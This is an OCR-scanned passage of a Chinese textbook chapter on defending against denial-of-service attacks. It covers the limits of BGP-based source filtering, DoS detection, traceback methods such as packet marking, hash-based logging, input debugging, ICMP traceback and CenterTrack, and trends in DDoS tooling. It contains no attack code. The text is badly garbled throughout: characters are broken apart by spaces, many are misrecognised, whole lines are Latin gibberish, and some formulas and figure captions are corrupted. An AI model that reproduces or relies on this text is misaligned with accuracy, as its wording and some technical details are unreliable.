1800 个 AS 实现 了 此 方法 ,才能 有 效 , 这 个 工作 量 是 巨大 的 ,况且 AS 的 数量 还 在 增加 。 此 
外 ,此 方法 需要 BGP 消息 以 携带 源 地 址 信息 ,这 势必 增加 BGP 消息 的 负载 从 而 增加 BGP 
消息 的 处 理 时 间 。 

其 次 ,如 果 路 由 发 生 了 改变 ,这 方法 就 会 丢弃 一 些 正常 的 数据 包 。 图 9-3 中 ,假设 在 正 
常 的 情况 下 ,由 AS3 到 AS6 的 数据 不 会 经 过 AS7 ,因此 ,如 果 有 数据 流 从 AS7 到 AS6 ,但 是 
数据 流 的 源 地 址 却 指明 是 AS3 的 ,那么 就 说 这 些 数据 流 是 假 的 ,就 会 被 丢弃 。 如 果 由 于 
AS5 到 AS6 的 连接 失败 ,拥塞 或 策略 等 原因 导致 由 AS3 到 ASO 的 路 由 改变 为 AS3-AS5- 
AS10-AS9-AS7-AS6。 如 果 AS6 的 边界 路 由 硕 并 没有 立刻 更 新 相关 的 信息 ,尤其 地 址 信 
KAF AS2 的 正 篆 的 数据 流 将 会 在 AS7 和 ASO 的 连接 处 被 天 弃 。 

最 后 ,这 个 方法 只 能 限制 而 不 是 杜绝 IP 伪造 的 空间 ,所 以 , 它 就 更 不 可 能 阻止 没有 伪造 
的 DDoS 的 攻击 ,如 从 被 攻破 的 主机 发 出 的 攻击 。 因 为 这 个 方法 的 过 滤 规 则 是 并 不 细致 的 
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( 仅 限 制 于 AS 级 别 ) ,根据 网 络 拓扑 结构 ,攻击 者 就 可 以 伪造 IP 地 址 。 另 一 方面 ,攻击 者 从 
它 占 领 的 计算 机 可 以 直接 发 起 攻击 ,根本 不 用 伪造 IP 地址。 并且 ,这 个 方法 是 和 BGP 消息 
有 直接 关系 的 ,所 以 攻击 者 可 以 通过 支持 BGP 会 话 的 方式 ,散播 虚假 的 BGP 消息 ,路 由 器 
被 误导 ,使 它 用 有 利于 攻击 者 的 方式 来 更 新 过 滤 的 规则 。 


9.4.2 拒绝 服务 攻击 的 检测 


除了 防御 外 ,拒绝 服务 攻击 的 检测 也 是 其 对 条 中 重要 的 一 环 。 由 于 拒绝 服务 攻击 的 防 
汇 比 较 困 难 , 其 检测 方法 在 过 去 较 长 的 时 间 内 没有 受到 足够 的 重视 。 随 看 拒绝 服务 攻击 问 
Bi o Bk j^ E ,拒绝 服务 攻击 的 防范 技术 的 研究 也 未 渐 热 起 来 。 相 应 地 ,一 些 研 究 人 员 也 开 
始 了 对 拒绝 服务 攻击 检测 技术 的 研究。 

DoS 攻击 的 检测 与 普通 的 入 侵 检 测 有 相同 的 地 方 也 有 不 同 的 地 方 。 痛 先 , 对 于 普通 的 
入 侵 检 测 , 如 普通 用 户 权 限 到 根 权限 的 提升 攻击 (User to Root,) 和 还 程 权限 到 本 地 权限 的 
提升 攻击 (Remote-To-Local,R2L), 攻 击 痢 可 以 修改 系统 审计 记录 ,或 者 删除 其 留 下 的 记 
录 , 通 过 这 种 方式 来 掩 曾 踊 迹 ,同时 当 发 生 攻 击 的 时 候 , 攻 击 者 行为 或 受害 者 行为 可 能 并 不 
会 发 生 明显 的 异常 。 因 此 ,这 些 攻击 很 难 检测 出 来 。 然 而 ,如 于 发 生 拒 绝 服 务 攻 击 , 受 害 许 
的 服务 能 力 就 会 明显 下 降 , 如 发 生 较 高 的 丢 包 率 等 ,拒绝 服务 攻击 比较 容 多 检测。 其 次 , 拒 
绝 服务 攻击 检测 为 一 个 重要 问题 束 是 误 报 。 由 于 风 雄 型 把 绝 服 务 攻击 的 力度 只 与 攻击 流量 
的 大 小 有 关系 ,与 软件 或 协议 汤 洞 的 利用 并 没有 关联 。 风 骏 型 拒绝 服务 攻击 可 以 有 效 实施 ， 
而 无 须 不 必要 的 丁 形 数据 包 和 恶意 的 数据 载 倚 ,因此 ,任何 一 种 检测 方法 痢 可 能 把 合法 数据 


9.4.3 拒绝 服务 攻击 的 追踪 


人 研究 表明 ,很 多 入 侵 者 党 第 会 因为 责任 追究 的 危险 而 受到 威慑 ,他 们 非常 害怕 失去 匿名 
性 。 正 如 现实 世界 中 当 人 们 从 事 一 些 不 合 规矩 或 违法 的 事情 时 ,都 会 担心 被 发 现 , 或 者 名 誉 
受 损 ,或 者 被 惩罚 。 例 如 , 当 有 交警 在 场 时 ,交通 违章 会 减少 很 多 ,即使 交警 不 在 场 ,有 摄像 
头 在 的 地 方 ,交通 违章 事件 也 会 减少 很 多 。 因 此 ,如 果 我 们 能 追踪 到 攻击 者 , 则 因为 攻击 者 
受到 威慑 ,攻击 事件 的 发 生 会 减少 很 多 。 追 踪 的 理想 目标 是 找到 真正 的 攻击 者 ,以 便 追 究 其 
责任 ,这 同时 也 达到 了 威慑 的 效果 。 然 而 ,就 目前 而 言 , 由 于 攻击 者 通常 都 是 利用 倪 偶 机 发 
起 攻击 的 ,要 找到 真正 的 攻击 者 并 不 是 总 能 做 到 的 。 因 此 ,在 拒绝 服务 攻击 的 追踪 方面 ,人 
们 主要 关心 的 是 追踪 到 攻击 的 发 出 点 , 即 攻 击 性 数据 包 的 源头 。 至 于 追踪 到 用 后 真正 的 “ 黑 
手 ”, 则 是 跳板 追踪 (Stepping Stone) 需 要 考虑 的 范畴 ,跳板 追踪 涉及 的 范围 远 不 止 于 拒绝 服 
务 攻 击 , 它 还 包括 对 其 他 人 侵 方 式 的 人 侵 者 追踪。 跳板 追踪 可 以 划 为 人 侵 检 测 的 范畴 。 

1. 拒绝 服务 攻击 的 追踪 问题 

1) JB ER HAE X. 

本 书 讨 论 的 拒绝 服务 攻击 的 追踪 问题 是 指 通过 一 定 的 机 制 .手段 ,确定 真正 攻击 数据 包 
的 来 源 ,以 及 为 了 攻击 数据 包 而 要 经 过 的 完整 路 径 。 这 里 的 数据 包 的 来 源 , 可 能 是 实施 了 和 追 
踪 的 网 络 的 某 个 人 口 点 (考虑 到 追踪 方法 还 没有 在 Internet 全 范围 实施 的 情况 下 ,此 入 口 点 
指 的 是 攻击 性 数据 包 从 没有 实施 追踪 方法 的 网 络 进 入 实施 追踪 方法 的 网 络 时 的 第 一 个 人 口 
点 )、 实际 发 出 数据 包 的 主机 或 网 络 ,甚至 可 能 是 实施 了 追 足 的 网 络 中 的 受 攻击 者 控制 的 某 
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2) PY24i8 Ex (Network TraceBack) 与 攻击 奶 答 (Attack Attribute) 

为 了 人 研究 网 络 攻击 ,首先 要 分 清楚 网 络 奶 蹊 和 攻击 退 答 的 区 别 。 因 为 网 络 攻 击 奶 查 这 
度 的 不 同 , 对 攻击 者 的 追 足 又 可 以 分 为 3 个 层次 ,分 别 为 网 络 妃 踩 、. 跳 板 仍 蹊 和 攻击 追 咎 。 
其 中 ,攻击 退 答 是 指 查 找 导 致 攻击 行为 产生 的 个 人 或 组 织 的 过 程 。 攻 击 退 答 与 本 书 讨论 的 
网 络 追 踊 不 同 ,网 络 追 踪 作 为 前 者 的 辅助 手段 而 存在 , 它 是 要 对 发 起 攻击 的 个 人 或 组 织 进行 
奶 踊 和 审查 ,这 个 过 程 不 仪 只 涉及 技术 问题 ,而 且 还 涉及 跳板 奶 踪 依赖 非 技 术 手 段 的 退路， 
同时 还 有 一 些 与 安全 相关 的 管理 和 法 律 问题 ,这 个 过 程 是 极其 复杂 的 。 所 以 ,本 书 讨 论 的 内 
容 只 限于 网 络 退 踊 这 一 技术 问题 。 

3) 拒绝 服务 攻击 追踪 的 重要 性 

拒绝 服务 攻击 成 为 Internet 安全 最 严重 的 威胁 之 一 的 原因 在 很 大 程度 上 是 取决 于 它 难 
以 追踪 的 特点 。Dos 攻击 数据 来 源 的 追 踩 既 可 以 成 为 退 足 和 手 后 攻击 者 的 基础 ,也 可 以 成 为 
直接 法 律 责 任 的 法 律 证 据 , 当 然 还 可 以 为 Dos 攻击 的 防范 ,如 为 过 滤 攻 击 数据 包 等 措施 提 
供 信息 ,达到 很 好 的 防御 效果 。 因 此 ,对 DoS 攻击 的 追踪 的 研究 理所当然 地 成 为 防范 DoS 
攻击 的 重要 研究 内 容 之 一 。 

全 方位 地 防范 攻击 中 对 拒绝 服务 攻击 的 奶 踊 是 非常 重要 的 。 其 作用 主要 有 以 下 几 点 。 

C1) 可 以 退 究 攻击 痢 的 贡 任 ,也 可 以 威慑 潜在 的 攻击 者 ,由 此 减少 此 类 攻击 事件 的 发 生 。 

(2) 攻击 者 使 用 的 倪 偶 机 可 以 被 发 现 , 发 现 后 立即 通知 倪 介 机 管理 员 , 巾 此 提高 便 儒 机 
所 在 网 络 的 安全 性 。 

(3) 在 离 攻击 者 最 近 的 位 置 可 以 利用 分 流 和 过 滤 等 其 他 的 防御 手段 来 作为 辅助 防御 手 
段 ,以 达到 更 好 的 防御 效果 ,同时 ,攻击 路 径 上 的 若干 路 由 天 就 不 会 继续 转发 攻击 包 , 这 样 可 
LA dak > PX) 5 tu AY S. BE o 

2. 包 标 记 追 踪 

包 标 记 的 主要 思想 是 在 路 由 兹 处 以 一 定 的 概率 癌 过 往 的 数据 包 中 填塞 部 分 的 路 径 信 

当 受 害 者 收 到 大 量 的 来 日 于 攻击 者 或 受 攻击 者 控制 的 计算 机 的 数据 包 时 ,通过 收 到 的 
数据 包 受害 者 就 能 利用 收集 到 的 路 径 信息 重 构 出 完整 的 数据 包 经 过 的 路 径 。 

3. 日 志 记 录 

日 志 记 录 (Logging) 的 基本 思想 是 在 数据 包 的 传输 路 途中 ,路 由 带 将 数据 包 的 信息 记 
录 下 来 。 这 种 方法 最 大 的 问题 是 要 求 有 很 大 的 存储 空间 。 如 果 中 由 带 记 录 下 通过 它 的 每 一 
个 数据 包 的 全 部 内 容 , 那 么 一 个 1. 25GB/s 的 OC-192 的 连接 就 需要 路 由 器 为 一 分 钟 数据 准 
fr 75GB 的 空间 。 随 着 路 由 器 连接 数 的 增加 ,这 种 对 存储 空间 要 求 的 激增 使 得 这 种 记录 全 
部 信息 的 方法 不 可 行 。 

一 种 解决 办 法 是 路 由 需 不 是 存储 数据 包 的 全 部 信息 ,而 是 存储 其 某 些 特殊 的 、 能 够 借以 
相互 区 别 的 信息 。Snoere 等 提出 了 一 种 基于 摘要 (Hash Based) A) IP 3B £x TE 3X — TK 
要 求 所 有 的 路 由 兹 都 保存 其 转发 过 的 数据 包 的 部 分 信息 的 摘要 ,这 个 摘要 覆盖 IP 头 中 的 不 
pe 头 中 服务 类 型 TITL,. 校 验 和 、 选 项 域 为 可 变 域 ,其 余 为 不 变 域 ) 和 数据 载荷 中 的 前 

字 节 数据 。 当 某 个 受害 痢 通 过 其 人 侵 检 测 系统 检测 到 攻击 存在 ,并 打算 奶 蹊 其 收 到 的 
ee td beanie E [5] 3B Ec BE #8 (Traceback Manager) Æ HIE ia ok. 3B bk 
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管理 需 对 受害 者 的 请 求 验证 无 误 后 即 询 问 受 害 关 的 上 游 路 由 硕 ,看 该 数据 包 是 由 哪些 路 巾 
需 转 发 的 。 当 一 个 路 由 需 接 到 查询 时 ,其 检查 自己 的 数据 库 中 是 否 有 要 查询 的 数据 包 的 摘 
要 ,如 果 有 , 则 说 明 该 数据 包 以 很 大 的 概率 (由 于 采用 了 摘要 和 Bloom filter 以 减少 必需 的 
存储 空间 ,从 而 导致 误 报 的 和 存在) 通过 了 此 路 由 问 , 于 是 路 由 带 以 肯定 的 党 案 回 复 妃 中 管理 
稻 。 追 踪 管 理 大 再 根据 各 路 由 天 的 返回 结果 重 构 出 数据 包 的 路 径 ( 这 可 能 是 个 递归 的 过 

这 里 ,通过 存储 摘要 而 不 是 存储 全 部 信息 ,使 得 路 由 需 在 单位 时 间 内 需要 的 存储 空间 减 
少 到 其 连接 市 宽 的 0.5%%。 

这 个 方法 的 优点 是 受害 者 不 仅 能 追踪 风 骏 型 拒绝 服务 攻击 ( 即 多 个 数据 包 的 情形 ) ,还 
能 追踪 单个 数据 包 。 此 外 ,采用 数据 包 的 摘要 ,不 仅 使 得 保存 的 数据 量 降低 了 ,同时 还 避免 
了 因 保 存 数据 包 的 内 容 而 导致 泄漏 用 户 信 息 的 和 危险。 缺点 是 由 于 存储 设备 的 有 限 性 ,路 由 
器 只 能 存储 非常 短 时 间 内 的 数据 包 信 息 , 因 此 追踪 查询 必须 在 极 短 的 时 间 范 围 内 进行 。 这 
在 风 其 型 拒绝 服务 攻击 的 条 件 下 有 时 难以 满足 ,因为 在 受到 非常 严重 的 攻击 过 程 中 ,受害 者 
可 能 没有 能 力 发 送 查 询 数 据 包 ,或 者 受害 者 没有 及 时 发 现 攻击 的 存在 ,导致 追 踪 的 延迟 ,从 
而 使 得 延迟 的 追 踊 可 能 达 不 到 目标 。 

4. 连接 测试 

连接 测试 是 从 离 受 害 者 最 近 的 路 由 闫 开始 ,依次 检查 该 路 巾 硕 的 所 有 直接 上 洲 路 由 天 ， 
看 攻击 数据 流 是 由 哪个 路 巾 毅 转发 过 来 的 ,然后 以 新 的 路 由 需 为 基础 继续 检查 ,直到 不 能 继 
续 下 去 (如 找到 了 攻击 数据 流 的 源 或 到 了 一 个 管理 域 的 边界 ) 为 止 。 这 一 类 型 的 方法 必须 在 
攻击 尚 在 继续 时 进行 , 当 攻 击 停 止 后 ,这 类 方法 就 无 法 使 用 。 此 外 , 当 有 位 于 不 同 地 点 的 多 


个 攻击 痢 同 时 对 受害 痢 实 施 分 布 式 攻击 时 ,由 于 一 个 上 洲 路 由 冀 传 来 的 包 只 构成 攻击 数据 


流 的 一 小 部 分 , 当 切 断 这 一 小 部 分 时 ,对 攻击 效果 不 会 有 太 大 影响 ,因此 ,这 时 候 连 接 测试 的 
效果 将 不 会 很 好 。 

1) 3X fa] X, 3& (Back flooding) 

Burch SFe thi Y — P n] VAM EAS ga (eR USD. FETIP Ae A RH M E 
H P ir 23 is Vio A UP c AR EE XE BE SIL AR Ac HUE PP d ETT IE SC BY) Cod CS Dio SPM Ub] Co > , 
则 说 明 有 攻击 数据 流通 过 了 该 连接 。 利 用 预先 准备 的 网 络 的 拓扑 结构 信息 ,受害 者 可 以 获 
得 攻击 路 径 中 的 一 些 连接 。 采 用 递归 的 方法 ,有 党 害 者 能 得 到 完整 的 攻击 路 咎 。 这 个 方法 除 
了 必须 在 攻击 发 生 的 同时 进行 ,从 而 有 很 强 的 时 间 限 制 外 ,其 自身 也 构成 拒绝 服务 。 逆 向 风 
FA AY IE Ex uH] 9-4 Pros. BP. OO G0 00 Q) b zs E ze KLE M CEP AR. PST P BS fr SK deo im 
击 效 据 流 的 方 问 。 

2) A dit Input debugging) 

有 些 路 由 器 如 CISCO 路 由 器 具有 一 种 称 为 入 口 调试 的 功能 。 当 一 个 受害 者 检测 到 风 
又 型 拒绝 服务 攻击 时 ,其 将 攻击 事件 和 攻击 特征 通知 网 络 管理 员 ,网 络 管理 员 则 依据 攻击 特 
征 在 受害 者 的 上 游 路 由 策 处 引入 一 条 访问 控制 策略 以 检测 攻击 数据 流 来 自 于 哪个 路 由 需 。 
具体 方法 是 对 所 有 的 邻接 上 游 路 由 兹 依次 关闭 它们 到 受害 者 或 本 路 由 兹 的 连接 ,看 攻击 数 
据 流 有 没有 变化 ,如 条 关闭 茶 个 连接 以 后 ,攻击 数据 流 有 所 减弱 , 则 判断 为 攻击 数据 流 经 过 
了 该 连接 ,从 而 该 上 诉 路 由 融 是 攻击 树 的 一 个 记 点 。 

然后 在 该 路 由 兹 的 基础 上 继续 重复 上 述 过 程 ,下 到 追踪 到 攻击 者 或 退 踊 过 程 已 达 其 所 
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"uw ----- 攻击 路 径 逆向 风暴 
9-4 ”逆向 风暴 法 追踪 示意 图 


管理 网 络 的 边界 。 如 图 9-5 所 示 ,其 中 ,山名 田 由 四 标示 的 是 调试 的 步骤 ,对 同一 步 中 的 多 
个 连接 要 逐次 进行 测试 ,可 以 是 任意 顺序 。 当 追踪 到 网 络 边界 后 ,该 网 络 管 理 员 可 以 通知 临 
近 网 络 的 管理 员 dB OK BAIE Be OR SE JOB ER o 这 种 方法 通常 都 是 手工 操作 的 , 且 只 能 到 达 网 络 
边界 。 当 跨 网 追踪 时 ,不 同 网 络 的 管理 员 之 间 及 时 的 通信 和 合作 是 必 不 可 少 的 ,而 在 实际 
中 ,这 点 很 难得 到 保证 。 一 方面 ,网 络 管理 员 也 许 不 能 立即 联系 上 或 立即 予以 啊 应 ; 男 一 方 

面 ,其 他 网 络 的 管理 员 也 许 有 更 重要 的 事情 要 做 ,也 许 本 次 退 足 对 其 没有 利益 ,不 一 定 给 予 
& E. 





= 攻击 路 径 十 一 表示 临时 断 
Jr iX XE d 


9-5 人口 调试 示意 图 


5. ICMP 追踪 

当 一 个 数据 包 通 过 一 个 路 由 豆 时 ,该 路 由 天 可 以 以 一 定 的 概率 同时 癌 数 据 包 的 发 送 方 
和 (或 ) 接 收 方 发 送 带 认证 的 ICMP 人 奶 踊 信息 (一 种 新 定义 的 ICMP 包 , 类 型 为 
“TRACEBACK” 即 “ 退 踊 ”)。 这 个 退 踊 信息 包括 了 所 退 躁 数据 包 的 发 送 方 的 IP. 地 址 和 接收 
方 的 IP 地 址 、 时 稚 、 选 择 退 踊 与 否 了 所 使 用 的 概 六 ,以 及 被 退 踊 数据 包 中 的 条 些 内 容 一 一 人 至少 
包含 该 数据 包 的 IP 头 全 部 和 数据 载 何 的 前 64 6 5 Vr. DP SE NE BUE. SEE A 
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会 收 到 大 量 的 攻击 性 数据 包 , 伴 随 这 些 数据 包 的 还 有 与 其 中 部 分 数据 包 对 应 的 ICMP 追踪 
消息 。 由 于 这 些 追 踩 消息 携 带 了 产生 这 些 消息 的 路 由 需 的 JP 地址 、 被 追踪 数据 包 的 信息 ， 
其 中 的 TTL 还 反映 了 该 路 由 兹 到 受害 者 的 距离 信息 (255 WA TTL 即 为 距离 ,因为 iTrace 
消息 的 TTL 初始 值 要 求 设 为 255), 因 此 ,受害 者 可 以 挑 出 与 那些 攻击 性 数据 包 对 应 的 追 踊 
消息 ,根据 其 中 的 相关 信息 重组 一 个 以 受害 者 为 目的 地 (或 根 ) 的 攻击 路 径 或 攻击 树 ( 分 布 式 
攻击 的 情况 下 为 攻击 树 ) ,攻击 路 径 的 另 一 痪 或 攻击 树 的 叶 节 点 处 即 为 离 攻击 发 出 库 最 近 的 
路 由 器 。ICMP 追踪 示意 图 如 9-6 所 示 。 


L—) RR? = R3 — R4 





图 9-6 ICMP 追踪 示意 图 


这 种 方法 有 两 个 缺点 : 一 是 被 退 踩 的 数据 包 与 奶 踩 包 是 分 开 的 ,它们 可 能 因为 路 由 宋 
略 或 防火 墙 磺 略 而 使 其 中 一 个 被 丢弃, 男 一 个 被 传输 到 受害 者 ,从 而 使 得 退 踊 出现 误 差 ; 二 
是 在 受害 者 获得 攻击 路 径 中 所 有 路 由 器 的 trace 信息 之 前 , 需 从 攻击 者 接收 大 量 的 包 , 如 建 
议 路 由 带 以 概率 1/20000 产生 人 奶 踊 包 , 现 在 看 受害 者 需要 接收 多 少 攻 击 包 。 设 攻击 中 径 长 
FEN 20, 并 设 攻 击 者 发 送 工 个 数据 包 后 ,受害 者 获得 完整 的 攻击 路 径 的 概率 为 0.5, 则 有 
[1— (19 999/20 000)? |? = 0.5 
于 是 可 得 
ee log(1 — 0. 51°) 
~~ log(19 999/20 000) 
即 当 距离 受害 者 20 跳 (Hop) 的 一 个 攻击 者 发 送 67588 个 数据 包 以 后 ,受害 者 才 有 50% HY 
率 得 到 完整 的 攻击 路 径 , 硅 要 受害 者 能 有 90% 的 机 会 获得 完整 的 路 径 , 则 其 必须 收 到 至 少 
104 972 个 攻击 者 的 数据 包 。 如 果 希 望 受 害 者 能 尽快 地 获得 攻击 路 径 , 则 路 由 问 产 生 退 踪 包 
的 概率 必须 增 大 ,从 而 会 导致 较 大 量 的 额外 的 数据 流 ,占用 过 多 的 市 宽 。 
6. BEM 4 
CenterTrack 是 一 个 覆盖 网 络 , 通 过 物理 连接 \IP 隧道 或 第 二 层 虚 拟 连 接 方式 与 边界 路 
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HH ae FA. TE CenterTrack 的 解决 方 条 中 ,一 些 可 疑 ( 指 有 可 能 是 攻击 性 的 ) 的 数据 包 由 边 
界 路 由 带 卫 接 转 发 到 覆 六 网 络 ( 也 称 为 退 踊 网 络 , 提 供 对 数据 包 的 奶 踊 功能 ) 中 特殊 的 退路 
bit FH at (Tracking Router), iB br P 2# ak 55 < TH E H5] UR IR Ae (Sniffer) T8 a 29098 HEA TK INI A 
HJA E12] Br 28 05 82, H7] ORD OR A PBA 27-18 H 6 o 3B E PA 2 EY CT Lm Zeb BE— XS 
d ,然后 根据 检查 绪 采 决定 丢 径 该 包 或 是 将 其 转发 到 相应 的 出 口 。 

在 数据 包 的 终 病 ,一旦 发 现 有 攻击 在 进行 时 ,受害 者 或 其 代理 可 以 通过 退 踊 网 络 查 到 转 
发 攻击 数据 包 进 入 追踪 网 络 的 那个 边界 路 由 大 ,如 图 9-7 所 示 。 








有 追踪 网 络 的 条 件 下 可 

一 一 证 疑 数据 的 路 径 ， 即 追踪 
得 到 的 攻击 路 径 

无 迫 踪 网 络 时 攻击 数据 

一 一 一 的 路 径 和 有 追踪 网 络 时 
可 疑 数 据 的 路 径 


Bie 


图 9-7  CenterTrack 追踪 示意 图 


此 方法 的 优点 有 两 方面 。 一 方面 , 它 不 仅 能 追踪 ,还 能 通过 丢弃 攻击 性 数据 包 而 起 到 防 
WIE ,或 者 至 少 减 轻 攻 击 力 度 的 作用 。 吨 一 方面 ,这 个 方法 在 路 巾 硕 被 攻破 时 会 失去 作用 
(最 近 几 年 ,路 由 大 和 其 他 关键 基础 设施 受 攻击 的 事件 在 不 断 增加 )。 如 果 攻 击 者 不 仅 控 制 
了 用 于 攻击 的 主机 ,而且 控 制 了 其 边界 路 由 器 (与 追踪 网 络 连接 的 路 由 器 ) , 则 这 些 边 界 路 由 
器 可 以 不 将 攻击 数据 包 路 由 到 追踪 网 络 , 从 而 使 得 追踪 失效 。 因 此 , 除 追 踊 网 络 外 ,边界 路 
由 需 的 安全 性 也 是 至 关 重 要 的 ,而 要 保证 所 有 的 边界 路 由 器 的 安全 即使 不 是 不 可 能 ,至少 也 
是 困难 的 。 此 外 ,出 于 效率 的 缘故 , 追 足 网 络 应 该 是 轻 量 级 的 ,而 如 果 所 有 的 TCP 的 SYN 
包 、 所 有 的 UDP 所、 一 些 类 型 ICMP 包 等 都 转发 到 追踪 网 络 中 , 则 追踪 网 络 必定 会 过 载 ,这 
是 因为 这 些 数据 包 都 可 能 是 攻击 性 数据 包 , 而 且 这 类 数据 包 的 量 是 很 大 的 。 

除了 以 上 三 大 类 防范 技术 之 外 ,还 有 一 些 防范 措施 建议 : 时 刻 关 注 安 全 信息 ,关注 安全 
问题 的 发 展 趋 势 : 对 外 开放 访问 的 主机 进行 优化 ,出 现 系 统 补丁 及 时 更 新 ,对 主机 正确 设 
置 , 关 闭 一 些 不 必要 的 服务 ; 安 沪 防火 增 对 数据 包 过 滤 , 并 且 要 对 防火 墙 正 确 设置 , 启 用 防 
火 墙 的 防 DoS/DDoS 属性 ; 优化 路 由 和 网 络 结 构 并 对 路 由 右 进 行 正确 设置 ; 与 ISP 合作 协 
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助 ,辅助 实施 正确 的 路 由 访问 控制 训 略 ,由 此 保护 市 宽 和 内 部 网 络 ; 28 ULIS PR ile Zr 
查 汤 洞 数据 库 ,通过 这 个 方式 确保 服务 硕 版 本 不 受 影响 


9.5 拒绝 服务 攻击 的 发 展 趋 势 


本 市 分 几 个 方面 讨论 了 拒绝 服务 攻击 的 发 展 趋 势 。 未 来 ,DoS 具有 以 下 几 个 特征 : 
DoS 攻击 隐蔽 性 更 好 ; DoS 攻击 将 会 更 多 采用 分 布 式 技术 ; DoS 攻击 工具 将 会 更 易 操 作 ， 
功能 将 更 完善 ,破坏 性 更 大 ; DoS 攻击 将 会 更 多 地 针对 路 由 硕 和 网 关 进 行 ; DoS 攻击 将 会 
更 多 的 针对 TCP/IP 协议 的 先天 缺陷 进行 。 针 对 DoS 防范 技术 ,DoS 攻击 防范 技术 将 会 综 
合 更 多 种 算法 、 集 成 更 多 种 网 络 设备 功能 与 多 种 安全 产品 联动 或 集成 ; DoS 攻击 防范 软件 
可 能 借助 硬件 特性 提高 处 理 速率 ; DoS 攻击 防范 技术 或 产品 可 靠 性 更 高 。 


9.5.1 攻击 程序 的 安装 


通常 ,攻击 程序 是 安装 在 被 攻破 的 计算 机 上 的 。 这 种 安装 方式 依赖 于 受害 者 (这 个 受害 
者 不 是 拒绝 服务 攻击 的 最 终 受 害 者 ,而 是 DDoS 攻击 过 程 第 二 个 阶段 的 受害 者 ,其 在 拒绝 服 
务 攻 击 中 被 当 作 仇 仿 机 ) 系 统 上 的 源 洞 和 攻击 者 的 技巧 。 如 今 ,攻击 方法 渐 趋 复杂 化 、 晶 动 
化 ,目标 也 有 目的 地 或 随意 地 选取 基于 Windows 的 系统 或 路 由 器 。 从 一 个 漏洞 的 首次 发 现 
到 该 源 洞 被 攻击 音 成 功 地 利用 之 则 的 时 间 间 阳 越 来 越 短 。 

1. 自动 化 程度 越 来 越 高 

过 去 ,就 像 大 多 数 的 攻击 工具 一 样 ,DoS 工具 也 常常 经 攻击 者 手工 安 疲 到 被 其 攻破 的 计 
算 机 系统 中 。 随 着 时 间 的 推移 ,攻击 者 在 DoS 攻击 技术 的 多 个 方面 都 提高 了 攻击 自动 化 的 
程度 。 攻 击 者 采用 的 目 动 化 过 程 的 第 一 个 阶段 是 大 范围 地 目 动 扫 摘 以 确定 受害 者 。 第 二 个 
阶段 则 是 扫 摘 可 能 比较 弱 的 系统 并 上 自动 攻击 这 些 系统 ,然后 记录 下 被 攻破 的 那些 系统 以 备 
今后 使 用 ,这 一 步 目 动 攻击 脆弱 的 系统 又 提高 了 攻击 全 过 程 的 目 动 化 程度 。 第 三 个 阶段 则 
Fe A BF of hh Ei HE RSP Ke DDoS 攻击 的 工具 。 

有 时 攻击 者 也 利用 网 络 对 广播 包 的 啊 应 “放大 ”攻击 流 ,如 前 面 的 fraggle 攻击 . smurf 
攻击 ,还 有 其 他 的 放大 型 攻击 。 攻 击 者 也 和 常 第 利用 微软 的 IIS 服务 天 系统 的 脆 弦 性 ,从 这 些 

MX. Bie AF A t T BÉ 8S TE AAAS Hos dd d. ACH ARN LR. 
Tornkit 就 是 这 样 一 个 例子 。 这 一 类 的 工具 在 没有 攻击 者 手工 参与 的 情况 下 不 会 传播 到 其 
他 的 系统 。 

H A ramen Sig JT 4. — £e BÉ 9$ A 2] dH di. A Ao Ao eR FF AA SI fedis HJ LH. 
也 相继 出 现 。 其 中 日 动 传播 的 方式 主要 有 3 种 ,集中 式 传播 先后 连接 式 传播 和 日 动 传 播 。 

2. 基于 Windows 的 系统 越 来 越 多 地 成 为 目标 

早期 ,日 动 攻 击 一 般 都 针对 UNIX 系统 ,而 针对 Windows 系统 的 攻击 通常 都 会 在 某 种 
程度 上 利用 社交 工程 以 获得 成 功 。 如 今 , 针 对 Windows 系统 的 攻击 逐渐 增多 。 有 一 种 看 法 
是 ,与 其 他 的 网 络 用 户 如 专用 系统 或 网 络 的 管理 员 相 比 , Windows 的 终端 用 户 通 第 在 技术 
上 不 是 很 高 ,安全 意识 蝎 洗 溥 , 很 少 保护 他 们 的 系统 或 预防 他 们 的 系统 被 攻击 。 
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3. 路 由 器 和 其 他 的 网 络 基础 设施 也 逐渐 成 为 受 攻击 的 目标 

现在 ,攻击 和 利用 路 由 器 的 事例 越 来 越 多 。 攻 击 者 常常 利用 销售 商 提供 的 默认 口令 获 
得 对 一 些 配置 和 管理 比较 差 的 路 由 器 的 非法 访问 。 攻 击 者 有 时 将 这 些 路 由 器 用 于 扫描 活动 
的 平台 代理 服 务 器 ,以 及 风暴 型 拒绝 服务 的 攻击 点 。 路 由 器 对 攻击 者 很 有 吸引 力 ,因为 ,路 
由 器 与 计算 机 系统 相 比 ,更 多 地 起 到 网 络 基础 设施 的 作用 ,因此 在 其 他 的 攻击 者 面前 显得 更 
为 “安全 ”, 并 且 , 一 般 认 为 路 由 器 不 容易 攻破 ,所 以 路 由 器 常常 更 少 受到 监控 ,如 果 攻 击 者 
“占领 了 路 由 器 ,通常 很 难 被 发 现 。 

4. 漏洞 的 首次 发 现 到 该 漏洞 被 攻击 者 成 功 地 利用 之 间 的 时 间 间 隔 越 来 越 短 

当 漏 洞 发 布 以 后 ,攻击 者 能 够 很 快 就 能 研究 出 实际 的 攻击 方法 ,并 且 编写 利用 该 漏洞 的 
攻击 代码 。 


9.5.2 攻击 程序 的 利用 


在 早期 的 DDoS 攻击 中 ,攻击 者 通 过 其 控制 下 的 控制 台 同 攻击 计算 机 发 送信 令 , 然 后 攻 
击 计算 机 向 受害 者 发 起 攻击 。 攻 击 者 与 控制 台 之 间 的 通信 信 迄 通 党 是 控制 台 能 够 监听 攻击 
者 发 出 的 连接 ,然后 控制 侣 计算 机 从 这 些 连 接 中 接收 命令 。 在 控制 台 和 攻击 计算 机 之 间 则 
有 了 两 条 信道, 控制 全 要 能 够 监听 攻击 计算 机 发 出 的 数据 包 以 允许 攻击 计算 机 注册 其 IP 地 
址 ,而 攻击 计算 机 则 监听 控制 台 的 命令 。 通 第 ,通信 信 记 部 是 利用 固定 的 没有 标准 服务 的 端 
口 。 有 些 DDoS 工具 如 Stacheldraht , 4 TE 38i fri P 2K FH JI 285 3c 7N LA HE ui: DDoS 攻击 网 络 。 

早期 的 DDoS 网 络 工 具 使 得 其 DDoS 网 络 比较 容易 识别 并 予以 破坏 。 因 为 攻击 计算 机 
会 保存 列 有 一 个 或 多 个 控制 全 的 列表 ,这 个 列表 通常 是 通过 在 攻击 程序 中 固化 的 IP 地 址 
